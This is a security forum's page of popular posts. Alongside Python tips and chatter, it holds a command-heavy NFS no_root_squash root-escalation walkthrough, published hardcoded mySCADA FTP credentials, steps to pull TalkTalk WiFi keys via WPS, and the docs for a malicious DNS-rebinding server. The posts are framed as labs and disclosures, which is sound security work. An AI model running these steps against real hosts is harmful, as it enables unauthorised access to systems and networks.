Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 05/28/18 in all areas

  1. Python is an amazing language with a strong and friendly community of programmers. However, there is a lack of documentation on what to learn after getting the basics of Python down your throat. Through this book I aim to solve this problem. I would give you bits of information about some interesting topics which you can further explore. The topics which are discussed in this book open up your mind towards some nice corners of Python language. This book is an outcome of my desire to have something like this when I was beginning to learn Python. If you are a beginner, intermediate or even an advanced programmer there is something for you in this book. Please note that this book is not a tutorial and does not teach you Python. The topics are not explained in depth, instead only the minimum required information is given. I am sure you are as excited as I am so let’s start! Note: This book is a continuous work in progress. If you find anything which you can further improve (I know you will find a lot of stuff) then kindly submit a pull request! Author I am Muhammad Yasoob Ullah Khalid. I have been programming extensively in Python for over 3 years now. I have been involved in a lot of Open Source projects. I regularly blog about interesting Python topics over at my blog . In 2014 I also spoke at EuroPython which was held in Berlin. It is the biggest Python conference in Europe. If you have an interesting Internship opportunity for me then I would definitely like to hear from you! Table of Contents 1. *args and **kwargs 1.1. Usage of *args 1.2. Usage of **kwargs 1.3. Using *args and **kwargs to call a function 1.4. When to use them? 2. Debugging 3. Generators 3.1. Iterable 3.2. Iterator 3.3. Iteration 3.4. Generators 4. Map, Filter and Reduce 4.1. Map 4.2. Filter 4.3. Reduce 5. set Data Structure 6. Ternary Operators 7. Decorators 7.1. Everything in Python is an object: 7.2. Defining functions within functions: 7.3. Returning functions from within functions: 7.4. Giving a function as an argument to another function: 7.5. Writing your first decorator: 7.6. Decorators with Arguments 8. Global & Return 8.1. Multiple return values 9. Mutation 10. __slots__ Magic 11. Virtual Environment 12. Collections 12.1. defaultdict 12.2. OrderedDict 12.3. counter 12.4. deque 12.5. namedtuple 12.6. enum.Enum (Python 3.4+) 13. Enumerate 14. Object introspection 14.1. dir 14.2. type and id 14.3. inspect module 15. Comprehensions 15.1. list comprehensions 15.2. dict comprehensions 15.3. set comprehensions 16. Exceptions 16.1. Handling multiple exceptions: 17. Lambdas 18. One-Liners 19. For - Else 19.1. else clause: 20. Python C extensions 20.1. CTypes 20.2. SWIG 20.3. Python/C API 21. open Function 22. Targeting Python 2+3 23. Coroutines 24. Function caching 24.1. Python 3.2+ 24.2. Python 2+ 25. Context managers 25.1. Implementing Context Manager as a Class: 25.2. Handling exceptions 25.3. Implementing a Context Manager as a Generator Link: http://book.pythontips.com/en/latest/index.html
    2 points
  2. ceva basic: file_changed = false #load data from file for x in ...: if blocked: while not file_changed: #check if file content changed # load new data # set file changed to false # set blocked to false time.sleep(1) #do stuff #when blocked set blocked to true and continue Poti sa iti salvezi intr-un fisier datele de care ai nevoie.
    2 points
  3. Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu, and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster, and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute. installation git clone https://github.com/aboul3la/Sublist3r.git Recommended Python Version: Sublist3r currently supports Python 2 and Python 3. The recommended version for Python 2 is 2.7.x The recommened version for Python 3 is 3.4.x Dependencies: Sublist3r depends on the requests, dnspython, and argparse python modules. These dependencies can be installed using the requirements file: Installation on Windows: c:\python27\python.exe -m pip install -r requirements.txt Installation on Linux sudo pip install -r requirements.txt Alternatively, each module can be installed independently as shown below. Requests Module (http://docs.python-requests.org/en/latest/) Install for Windows: c:\python27\python.exe -m pip install requests Install for Ubuntu/Debian: sudo apt-get install python-requests Install for Centos/Redhat: sudo yum install python-requests Install using pip on Linux: sudo pip install requests dnspython Module (http://www.dnspython.org/) Install for Windows: c:\python27\python.exe -m pip install dnspython Install for Ubuntu/Debian: sudo apt-get install python-dnspython Install using pip: sudo pip install dnspython argparse Module Install for Ubuntu/Debian: sudo apt-get install python-argparse Install for Centos/Redhat: sudo yum install python-argparse Install using pip: sudo pip install argparse for coloring in windows install the following libraries c:\python27\python.exe -m pip install win_unicode_console colorama Usage Short Form Long Form Description -d --domain Domain name to enumerate subdomains of -b --bruteforce Enable the subbrute bruteforce module -p --ports Scan the found subdomains against specific tcp ports -v --verbose Enable the verbose mode and display results in realtime -t --threads Number of threads to use for subbrute bruteforce -e --engines Specify a comma-separated list of search engines -o --output Save the results to text file -h --help show the help message and exit Examples To list all the basic options and switches use -h switch: python sublist3r.py -h To enumerate subdomains of specific domain: python sublist3r.py -d example.com To enumerate subdomains of specific domain and show only subdomains which have open ports 80 and 443 : python sublist3r.py -d example.com -p 80,443 To enumerate subdomains of specific domain and show the results in realtime: python sublist3r.py -v -d example.com To enumerate subdomains and enable the bruteforce module: python sublist3r.py -b -d example.com To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines python sublist3r.py -e google,yahoo,virustotal -d example.com Using Sublist3r as a module in your python scripts Example import sublist3r subdomains = sublist3r.main(domain, no_threads, savefile, ports, silent, verbose, enable_bruteforce, engines) The main function will return a set of unique subdomains found by Sublist3r Function Usage: domain: The domain you want to enumerate subdomains of. savefile: save the output into text file. ports: specify a comma-sperated list of the tcp ports to scan. silent: set sublist3r to work in silent mode during the execution (helpful when you don't need a lot of noise). verbose: display the found subdomains in real time. enable_bruteforce: enable the bruteforce module. engines: (Optional) to choose specific engines. Example to enumerate subdomains of Yahoo.com: import sublist3r subdomains = sublist3r.main('yahoo.com', 40, 'yahoo_subdomains.txt', ports= None, silent=False, verbose= False, enable_bruteforce= False, engines=None) https://github.com/aboul3la/Sublist3r
    2 points
  4. Cat de naivi sunteti mai oameni. 1. Itemele de cs go nu cresc in valoare! Poate unele cutite rare sau stickere de la echipe care castiga in campionat. Cataturile de skinuri la 2-3 dolari nu valoareaza nimic si in plus scad in valoare. 2. Din deschis cutii nu poti castiga bani! E simpla statistica. 3. Daca vrei sa faci bani fa-ti site de gambling. 100.000 de rusi si-au facut site de pariuri cs si acum toti sunt milionari. Se discuta aici serios sa faci bani din cs:go ... Dumnezeu cu mila!
    2 points
  5. After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn how to exploit a misconfigured NFS share to gain root access to a remote host machine. Table of contents Introduction of NFS Misconfigured NFS Lab setup Scanning NFS shares Nmap script showmount Exploiting NFS server for Privilege Escalation via: Bash file C program file Nano/vi Obtain shadow file Obtain passwd file Obtain sudoers file Let’s Start!! Network File System (NFS): Network File System permits a user on a client machine to mount the shared files or directories over a network. NFS uses Remote Procedure Calls (RPC) to route requests between clients and servers. Although NFS uses TCP/UDP port 2049 for sharing any files/directories over a network. Misconfigured NFS Lab setup Basically, there are three core configuration files (/etc/exports, /etc/hosts.allow, and /etc/hosts.deny) you will need to configure to set up an NFS server. BUT to configure weak NFS server we will look only /etc/export file. To install NFS service execute below command in your terminal and open /etc/export file for configuration. sudo apt-get update sudo apt install nfs-kernel-server nano /etc/exports The /etc/exports file holds a record for each directory that you expect to share within a network machine. Each record describes how one directory or file is shared. Apply basic syntax for configuration: Directory Host-IP(Option-list) There are various options will define which type of Privilege that machine will have over shared directory. rw: Permit clients to read as well as write access to shared directory. ro: Permit clients to Read-only access to shared directory.. root_squash: This option Prevents file request made by user root on the client machine because NFS shares change the root user to the nfsnobody user, which is an unprivileged user account. no_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implication. async: It will speed up transfers but can cause data corruption as NFS server doesn’t wait for the complete write operation to be finished on the stable storage, before replying to the client. sync: The sync option does the inverse of async option where the NFS server will reply to the client only after the data is finally written to the stable storage. Hopefully, it might be clear to you, how to configure the /etc/export file by using a particular option. An NFS system is considered weak or Misconfigured when following entry/record is edit into it for sharing any directory. /home *(rw,no_root_squash) Above entry shows that we have shared /home directory and allowed the root user on the client to access files to read/ write operation and * sign denotes connection from any Host machine. After then restart the service with help of the following command. sudo /etc/init.d/nfs-kernel-server restart Scanning NFS shares Nmap You can take help of Nmap script to scan NFS service in target network because it reveals the name of share directory of target’s system if port 2049 is opened. nmap -sV --script=nfs-showmount 192.168.1.102 Basically nmap exports showmount -e command to identify the shared directory and here we can clearly observe /home * is shared directory for everyone in the network. Showmount The same thing can be done manually by using showmount command but for that install nfs-common package on your local machine with help of the following command. apt-get install nfs-common showmount -e 192.168.1.102 Exploiting NFS server for Privilege Escalation Bash file Now execute below command on your local machine to exploit NFS server for root privilege. mkdir /tmp/raj mount -t nfs 192.168.1.102:/home /tmp/raj cp /bin/bash . chmod +s bash ls -la bash Above command will create a new folder raj inside /tmp and mount shared directory /home inside /tmp/raj. Then upload a local exploit to gain root by copying bin/bash and set suid permission. Use df -h command to get summary of the amount of free disk space on each mounted disk. First, you need to compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh. Now we knew that /home is shared directory, therefore, move inside it and follow below steps to get root access of victim’s machine. cd /home ls ./bash -p id whoami So, it was the first method to pwn the root access with help of bin/bash if NFS system is configured weak. C Program Similarly, we can use C language program file for root privilege escalation. We have generated a C-Program file and copied it into /tmp/raj folder. Since it is c program file therefore first we need to compile it and then set suid permission as done above. cp asroot.c /tmp/root cd /tmp/raj gcc asroot.c -o shell chmod +s shell Now repeat the above process and run shell file to obtained root access. cd /home ls ./shell id whoami So, it was the second method to pwn the root access with help of bin/bash via c-program if NFS system is misconfigured. Nano/Vi Nano and vi editor both are most dangerous applications that can lead to privilege escalation if share directly or indirectly. In our case, it not shared directly but still, we can use any application for exploiting root access. Follow below steps: cp /bin/nano chmod 4777 nano ls -la nano Since we have set suid permission to nano therefore after compromising target’s machine at least once we can escalate root privilege through various techniques. cd /home ls ./nano -p etc/shadow When you will execute above command it will open shadow file, from where you can copy the hash password of any user. Here I have copied hash password of the user: raj in a text file and saved as shadow then use john the ripper to crack that hash password. Awesome!!! It tells raj having password 123. Now either you can login as raj and verify its privilege or follow next step. Passwd file Now we know the password of raj user but we are not sure that raj has root privilege or not, therefore, we can add raj into the root group by editing etc/passwd file. Open the passwd file with help of nano and make following changes ./nano -p etc/passwd raj:x:0:0:,,,:/home/raj:/bin/bash Now use su command to switch user and enter the password found for raj. su raj id whoami Great!!! This was another way to get root access to target’s machine. Sudoers file We can also escalate root privilege by editing sudoers file where we can assign ALL privilege to our non-root user (ignite). Open the sudoers file with help of nano and make following changes ./nano -p etc/sudoers ignite ALL=(ALL:ALL) NOPASSWD: ALL Now use sudo bash command to access root terminal and get root privilege sudo bash id whoami Conclusion: Thus we saw the various approach to escalated root privilege if port 2049 is open for NFS services and server is weak configured. For your practice, you can play with ORCUS which is a vulnerable lab of vulnhub and read the article from here. Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here Source: hackingarticles.in
    1 point
  6. self, sloboz, numai de d-astea am parte.
    1 point
  7. bre tu nu ai vrut cabinet stomatologic?
    1 point
  8. dar un if in acel for nu merge? gen daca nu apare acea eroare in valoare ta sa faca acel #do something. Sau dupa ce da valoare ... depinde caz, verifici valoare cu un if si sa faca sau sa nu faca mai departe in functie de valoare de care ai nevoie, sau sa genereze alt cookies daca e expirat sau nu e valid.
    1 point
  9. Este un program util (are toate tool-urile din kali) Consola: Tool-uri : De ceva timp nu prea au mai facut update-uri, dar iti poti face singur de pe github Download: https://pentestbox.org/
    1 point
  10. OWASP Nettacker project is created to automate information gathering, vulnerability scanning and eventually generating a report for networks, including services, bugs, vulnerabilities, misconfigurations, and other information. This software willutilize TCP SYN, ACK, ICMP and many other protocols in order to detect and bypass Firewall/IDS/IPS devices. By leveraging a unique method in OWASP Nettacker for discovering protected services and devices such as SCADA. It would make a competitive edge compared to other scanner making it one of the bests. https://github.com/zdresearch/OWASP-Nettacker
    1 point
  11. Payload List: Binaries Payloads 1) Android 2) Windows 3) Linux 4) Mac OS Scripting Payloads 1) Python 2) Perl 3) Bash Web Payloads 1) ASP 2) JSP 3) War Encrypters 1) APK Encrypter 2) Python Encrypter The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law. Download: Terminator-master.zip or git clone https://github.com/MohamedNourTN/Terminator.git Mirror: terminator.py Source
    1 point
  12. #Exploit Title: mySCADA myPRO 7 - Hardcoded FTP Username and Password #Date: 2018-05-19 #Exploit Author: Emre ÖVÜNÇ #Vendor Homepage: https://www.myscada.org/mypro/ #Software Link: https://www.myscada.org/download/ #Version: v7 #Tested on: Linux, Windows # I. Problem Description #In the latest version of myPRO (v7), it has been discovered that the ftp server's -running on port 2121- username and password information is kept in the file by using reverse engineering. Anyone who connects to an FTP server with an authorized account can upload or download files onto the server running myPRO software. # II. Technical Hardcoded username:password = myscada:Vikuk63 #Firstly, I found that what ports myPRO listened to. You can get information used by the netstat command about the ports and the services running on it. When you install myPRO, you can see many ports open. The vulnerability works on all supported platforms. #In my first research on the Windows OS, myPRO has many process and I noticed that ‘myscadagate.exe’ is listening to port #2121. #I found that they put the username and password (myscada:Vikuk63) in the source code. I obtained access by connecting to port 2121 of myPRO's server with any FTP client. #(Details: https://emreovunc.com/blog/en/mySCADA-myPRO7-Exploit.pdf) # III. Solution #As a workaround you need to restrict port 2121 access from the outside. There is no permanent solution for the vendor because there is no patch available. https://www.exploit-db.com/exploits/44656/
    1 point
  13. Purpose of this Article This article demonstrates a vulnerability found in the 'Super Router' router provided by the internet service provider TalkTalk to its customers. The vulnerability discovered allows the attacker to discover the Super Router's WiFi Password by attacking the WPS feature in the router which is always switched on, even if the WPS pairing button is not used. The purpose of this article is to encourage TalkTalk to immediately patch this vulnerability in order to protect their customers. Tools Used Windows Based Computer (Other tools on unix platforms may be just as effective, but for the purpose of this article we will focus on one) Wireless Network Adapter TalkTalk Router within Wireless Network Adapter Range Software 'Dumpper' available on Sourceforge (Tested with v.91.2) Steps to Reproduce Step 1: Run Dumpper and navigate to the WPS tab and select the target WiFi BSSID. Step 2: Click 'WpsWin' to begin probing the BSSID for the WPS pin. Step 3: After a couple of seconds, the WiFi access key to this network will be displayed bottom right. Scale of Vulnerability This method has proven successful on multiple TalkTalk Super Routers belonging to consenting parties which is enough to suggest that this vulnerability affects all TalkTalk Super Routers of this particular model/version. TalkTalk have been notified of this vulnerability in the past and have failed to patch it many years later. It is also documented across various community forums. Links: 2014 TalkTalk Forum Post: D-Link RT2860 [Security issue] 2014 BroadbandBanter Forum Post: TalkTalk DSL-3680 WPS security vulnerability 2016 Hashkiller Forum Post: WPA Packet Cracking - TalkTalk Disclosure TalkTalk have been notified of this vulnerability on the day of the article being written (21 May 2018) Typically a 30 day period from discovery to public release would be granted. However, in this case, as TalkTalk were made aware of this exploit back in 2014, public release is immediate. Date Disclosure 21 May 2018 Delivered to TalkTalk. 21 May 2018 Date of public release. Reference: https://securityaffairs.co/wordpress/72805/laws-and-regulations/talktalk-super-routers-flaws.html Source: https://www.indigofuzz.com/article.php?docid=talktalk1430
    1 point
  14. Whonow DNS Server A malicious DNS server for executing DNS Rebinding attacks on the fly. whonow lets you specify DNS responses and rebind rules dynamically using domain requests themselves. # respond to DNS queries for this domain with 52.23.194.42 the first time # it is requested and then 192.168.1.1 every time after that A.52.23.194.42.1time.192.168.1.1.forever.rebind.network # respond first with 52.23.194.42, then 192.168.1.1 the next five times, # and then start all over again (1, then 5, forever...) A.52.23.194.42.1time.192.168.1.1.5times.repeat.rebind.network What's great about dynamic DNS Rebinding rules is that you don't have to spin up your own malicious DNS server to start exploiting the browser's Same-origin policy. Instead, everyone can share the same public whonow server. Note: You should include UUIDs (e.g. a06a5856-1fff-4415-9aa2-823230b05826) as a subdomain in each DNS lookup to a whonow server. These have been omitted from examples in this README for brevity, but assume requests to *.rebind.network should be *.a06a5856-1fff-4415-9aa2-823230b05826.rebind.network. See the Gotchas section for more info as to why. Subdomains = Rebind Rules The beauty of whonow is that you can define the behavior of DNS responses via subdomains in the domain name itself. Using only a few simple keywords: A, (n)times, forever, and repeat, you can define complex and powerful DNS behavior. Anatomy of a whonow request A.<ip-address>.<rule>[.<ip-address>.<rule>[.<ip-address>.<rule>]][.uuid/random-string].example.com A: The type of DNS request. Currently only A records are supported, but AAAA should be coming soon. <ip-address>: an ipv4 (ipv6 coming soon) address with each octet seprated by a period (e.g. 192.168.1.1. <rule>: One of three rules (n)time: The number of times the DNS server should reply with the previous IP address. Accepts both plural and singular strings (e.g. 1time, 3times, 5000times) forever: Respond with the previous IP address forever. repeat: Repeat the entire set of rules starting from the beginning. [uuid/random-string]: A random string to keep DNS Rebind attacks against the same IP addresses separate from each other. See Gotchas for more info. example.com: A domain name you have pointing to a whonow nameserver, like the publicly available rebind.networkwhonow instance. Rules can be chained together to form complex response behavior. Examples # always respond with 192.168.1.1. This isn't really DNS rebinding # but it still works A.192.168.1.1.forever.rebind.network # alternate between localhost and 10.0.0.1 forever A.127.0.0.1.1time.10.0.0.1.1time.repeat.rebind.network # first respond with 192.168.1.1 then 192.168.1.2. Now respond 192.168.1.3 forever. A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.rebind.network # respond with 52.23.194.42 the first time, then whatever `whonow --default-address` # is set to forever after that (default: 127.0.0.1) A.52.23.194.42.1time.rebind.network Limitations Each label [subdomain] may contain zero to 63 characters... The full domain name may not exceed the length of 253 characters in its textual representation. (from the DNS Wikipedia page) Additionally, there may not be more than 127 labels/subdomains. Gotchas Use Unique Domain Names Each unique domain name request to whonow creates a small state-saving program in the server's RAM. The next time that domain name is requested the program counter increments and the state may be mutated. All unique domain names are their own unique program instances. To avoid clashing with other users or having your domain name program's state inadvertently incremented you should add a UUID subdomain after your rule definitions. That UUID should never be reused. # this A.127.0.0.1.1time.10.0.0.1.1time.repeat.8f058b82-4c39-4dfe-91f7-9b07bcd7fbd4.rebind.network # not this A.127.0.0.1.1time.10.0.0.1.1time.repeat.rebind.network --max-ram-domains The program state associated with each unique domain name is stored by whonow in RAM. To avoid running out of RAM an upper-bound is placed on the number of unique domains who's program state can be managed at the same time. By default, this value is set to 10,000,000, but can be configured with the --max-ram-domains. Once this limit is reached, domain names and their saved program state will be removed in the order they were added (FIFO). Running your own whonow server To run your own whonow server in the cloud use your domain name provider's admin panel to configure a custom nameserver pointing to your VPS. Then install whonow on that VPS and make sure it's running on port 53 (the default DNS port) and that port 53 is accessible to the Internet. # install npm install --cli -g whonow@latest # run it! whonow --port 53 If that ☝ is too much trouble, feel free to just use the public whonow server running on rebind.network 🌐. Usage $ whonow --help usage: whonow [-h] [-v] [-p PORT] [-d DEFAULT_ANSWER] [-b MAX_RAM_DOMAINS] A malicious DNS server for executing DNS Rebinding attacks on the fly. Optional arguments: -h, --help Show this help message and exit. -v, --version Show program's version number and exit. -p PORT, --port PORT What port to run the DNS server on (default: 53). -d DEFAULT_ANSWER, --default-answer DEFAULT_ANSWER The default IP address to respond with if no rule is found (default: "127.0.0.1"). -b MAX_RAM_DOMAINS, --max-ram-domains MAX_RAM_DOMAINS The number of domain name records to store in RAM at once. Once the number of unique domain names queried surpasses this number domains will be removed from memory in the order they were requested. Domains that have been removed in this way will have their program state reset the next time they are queried (default: 10000000). Testing A whonow server must be running on localhost:15353 to perform the tests in test.js # in one terminal whonow -p 15353 # in another terminal cd path/to/node_modules/whonow npm test Sursa: https://github.com/brannondorsey/whonow
    1 point
  15. https://www.sendspace.com/file/zry9w3 CVE nou: https://github.com/bhdresh/CVE-2017-0199
    1 point
  16. Salut, Aceasta categorie este dedicata incepatorilor. Daca esti incepator si ai o intrebare la care nu gasesti raspunsul, ai nevoie de ajutor in legatura cu o problema simpla sau doar niste sfaturi, aici e categoria potrivita. Evitati insa intrebarile de tipul "Cum sparg un site" si asa mai departe. Vom crea o pagina de FAQ (intrebari frecvente) unde va vom raspunde la aceste intrebari.
    1 point
  17. Posteza aceast topic pentru a va informa ca acum cateva luni in urma am postat o cere pentru RDP si SMTP , ulterior am fost contactat de ICQ: 665490889 exilium si pe Jabber: Scosty90@jabber.ru dupa putina discutie am concordat pretul si iam trimes suma de € 200, prin Western Union pe numele: Cires Gaby Adi . dupa o mare insistenta in a trimete bani cat mai rapid si tot odata a primi servicile platite acesta odata ce a ridicat bani nu a mai raspuns, dupa 2 zile la intamplarea aceasta vreu sa postez acest topic pentru a preveni ca alcineva sa trimeata bani sau sa fie inselat de aceasta persona, ulterior am facut plangere in parchet la tribunal, si va urma sa se sesizeze ancheta. Va voi informa ulterior cu alte informati.
    -1 points
  18. Cum nu ? armele reale de pe piata neagra :))) Il vedem la stiri peste cateva zile pe che arestat ptr trafic de armament. Bai Che.... esti extrem de polivalent frate, te infigi in toate si nu te alegi cu nimic
    -1 points
  19. Who knows how to hack facebook account
    -1 points
  20. link not working... please give working link..
    -1 points
  21. http://opa-sms.ro/public/download/OPA-SMS.ROSENDYOUFREESMS.zip
    -5 points
×
×
  • Create New...